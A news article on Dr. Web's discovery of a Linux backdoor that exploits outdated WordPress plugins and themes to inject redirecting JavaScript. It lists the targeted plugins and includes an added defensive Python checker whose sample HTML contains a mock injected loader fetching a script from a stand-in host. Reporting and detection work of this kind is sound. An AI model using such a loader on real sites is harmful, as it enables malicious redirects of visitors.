
A new Linux malware exploits outdated WordPress plugins

Dr. Web announced that they have discovered a new Linux malware that targets 32-bit and 64-bit Linux systems.


Erdem Yasar
January 4, 2023
  • Researchers at Dr. Web announced that they have discovered a trojan that exploits outdated WordPress plugins and themes.
  • The malware gets malicious JavaScript from a command and control server and injects the script into the website.
  • Dr. Web found two versions of the trojan, which has probably been used by hackers for the last three years.

Antivirus vendor Dr. Web published a report on a new Linux malware strain that uses vulnerabilities in outdated WordPress plugins and themes to inject malicious JavaScript. The malware targets Linux systems and provides remote command capabilities to its operator. It exploits 30 vulnerabilities in those plugins and themes.

Linux.BackDoor.WordPressExploit.1

Dr. Web has named the malware Linux.BackDoor.WordPressExploit.1, in accordance with its antivirus classification. According to the report, on the operator’s command it can perform the following actions:

  • Attack a specified webpage (website)
  • Switch to standby mode
  • Shut itself down
  • Pause logging its actions

Experts also claimed that cybercriminals have been using it for more than three years to carry out attacks and monetize the resale of traffic, or arbitrage. First, the trojan contacts the C&C server to receive the address of the site to infect. Then it tries to exploit vulnerabilities in the following outdated plugins and themes that may be installed on the website:

  • WP Live Chat Support Plugin
  • WordPress – Yuzo Related Posts
  • Yellow Pencil Visual Theme Customizer Plugin
  • Easysmtp
  • WP GDPR Compliance Plugin
  • Newspaper Theme on WordPress Access Control 
  • Thim Core
  • Google Code Inserter
  • Total Donations Plugin
  • Post Custom Templates Lite
  • WP Quick Booking Manager
  • Facebook Live Chat by Zotabox
  • Blog Designer WordPress Plugin
  • WordPress Ultimate FAQ
  • WP-Matomo Integration 
  • WordPress ND Shortcodes For Visual Composer
  • WP Live Chat
  • Coming Soon Page and Maintenance Mode
  • Hybrid

Once it exploits one of the vulnerabilities in these plugins and themes, it injects malicious JavaScript, downloaded from a remote server, into the page. When the page loads, this JavaScript runs first, and whenever a user clicks anywhere on the infected page, they are redirected to a website chosen by the attacker. The trojan also collects statistics and tracks the overall number of websites attacked.
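A site owner can check rendered pages for the kind of injection described above by listing every host that a `<script>` element references and comparing it with the hosts the site is expected to load from. The following is an added example, not code from the article or from Dr. Web's report; the function names, the allow-list and the sample HTML (reserved example domains) are constructed for illustration, since the article gives no indicator domains.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Host part of an absolute or protocol-relative URL inside inline JavaScript.
URL_HOST = re.compile(r"(?:https?:)?//([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)")

# Constructed sample page: one unexpected external script, one same-origin
# script, one allow-listed CDN script and one inline loader stub.
SAMPLE = """<html><head>
<script src="//tracker.example.net/s.js"></script>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdn.example.org/lib.js"></script>
</head><body>
<script>var s=document.createElement("script");s.src="https://loader.example.net/x.js";document.head.appendChild(s);</script>
</body></html>"""

class ScriptCollector(HTMLParser):
    """Collect (line, kind, host) for every host a <script> element references."""
    def __init__(self):
        super().__init__()
        self.refs = []
        self.in_script = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self.in_script = True
        src = dict(attrs).get("src")
        host = urlsplit(src.strip()).hostname if src else None
        if host:  # relative paths have no host and are same-origin
            self.refs.append((self.getpos()[0], "src", host.lower()))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:  # inline code that builds a remote script URL
            line = self.getpos()[0]
            for host in URL_HOST.findall(data):
                self.refs.append((line, "inline", host.lower()))

def unexpected_script_hosts(html, site_host, allowed_hosts=()):
    """Return script references whose host is neither the site nor allow-listed."""
    trusted = {site_host.lower(), *(h.lower() for h in allowed_hosts)}
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    return [ref for ref in collector.refs if ref[2] not in trusted]

if __name__ == "__main__":
    print(unexpected_script_hosts(SAMPLE, "blog.example.com", ["cdn.example.org"]))
```

Run it against the HTML a visitor actually receives rather than the theme files on disk, and treat each hit as a lead to review rather than a verdict.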

Dr. Web researchers also found an updated version of the trojan and named it Linux.BackDoor.WordPressExploit.2. The differences between the two versions are the C&C server address, the address of the domain from which the malicious JavaScript is downloaded, and an additional list of exploited vulnerabilities for the following plugins:

  • Brizy WordPress Plugin
  • FV Flowplayer Video Player
  • WooCommerce
  • WordPress Coming Soon Page
  • WordPress theme OneTone
  • Simple Fields WordPress Plugin
  • WordPress Delucks SEO plugin
  • Poll, Survey, Form & Quiz Maker by OpinionStage
  • Social Metrics Tracker
  • WPeMatico RSS Feed Fetcher
  • Rich Reviews plugin

Dr. Web said,

« With that, both trojan variants have been found to contain unimplemented functionality for hacking the administrator accounts of targeted websites through a brute-force attack, by applying known logins and passwords, using special vocabularies. It is possible that this functionality was present in earlier modifications, or, conversely, that attackers plan to use it for future versions of this malware. If such an option is implemented in newer versions of the backdoor, cybercriminals will even be able to successfully attack some of those websites that use current plugin versions with patched vulnerabilities.

Doctor Web recommends that owners of WordPress-based websites keep all the components of the platform up-to-date, including third-party add-ons and themes, and also use strong and unique logins and passwords for their accounts. »
